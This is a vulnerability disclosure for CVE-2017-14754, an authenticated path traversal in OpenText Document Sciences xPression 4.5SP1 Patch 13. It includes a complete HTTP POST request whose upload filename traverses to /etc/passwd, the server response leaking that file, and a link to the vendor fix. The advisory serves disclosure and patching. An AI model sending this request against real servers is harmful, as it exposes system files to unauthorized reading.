OpenText Document Sciences xPression 4.5SP1 Patch 13 Arbitrary File Read

OpenText Document Sciences xPression version 4.5SP1 Patch 13 suffers from an arbitrary file read vulnerability.


MD5 | ccde9b0619c01a56988bfe3396b12065

Title: OpenText Document Sciences xPression (formerly EMC Document
Sciences xPression) - Arbitrary File Read
Author: Marcin Woloszyn
Date: 27. September 2017
CVE: CVE-2017-14754

Affected Software:
==================
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)

Exploit was tested on:
======================
v4.5SP1 Patch 13 (older versions might be affected as well)

Arbitrary File Read:
====================

Authenticated user is able to read arbitrary system file due to path
traversal issue.

Vector :
--------

1) visit https://[...]/xAdmin/html/cm_datasource_summary.jsp and
select data source

2) modify and save datasource. xsd_datasource_schema_file parameter
filename is vulnerable:

POST /xAdmin/html/cm_datasource_group_xsd.jsp?action=get_schema_m HTTP/1.1
Host: [...]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[...]/xAdmin/html/cm_datasource_group_dispatcher.jsp?action=modify&refresh=yes&group_name=%43%75%73%74%6f%6d%65%72%58%58%45%74%65%73%74%27
Cookie: JSESSIONID=[...]; hideHeaderAndFooter=false
Connection: close
Content-Type: multipart/form-data;
boundary=---------------------------11140219741229998994791588049
Content-Length: 1472

-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_group_id"

301
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="group_name"

aaa
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="group_name_old"

aaa
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_schema_source"

fromServer
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_schema_location"

aaa.xml
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_schema_file";
filename="../../../../../../../../../../../../../../../../etc/passwd"
Content-Type: application/octet-stream


-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="delimiter_xpath"

e
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="customer_key_xpath"

e
-----------------------------11140219741229998994791588049
Content-Disposition: form-data; name="xsd_datasource_schema"

<?xml version="1.0" ?>
<aaa></aaa>

-----------------------------11140219741229998994791588049--

In response, file contents are returned:

HTTP/1.1 200 OK
[...]

<TEXTAREA name="xsd_datasource_schema" cols="10" rows="20"
class="largeoption"
readonly="readonly">root:x:0:0:[...]:/root:/bin/bash
bin:x:1:1:[...]:/bin:/sbin/nologin
daemon:x:2:2:[...]:/sbin:/sbin/nologin
adm:x:3:4:[...]:/var/adm:/sbin/nologin
sync:x:5:0:[...]:/sbin:/bin/sync
shutdown:x:6:0:[...]:/sbin:/sbin/shutdown
[...]

Fix:
====
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774

Contact:
========
mw[at]nme[dot]pl



Related Posts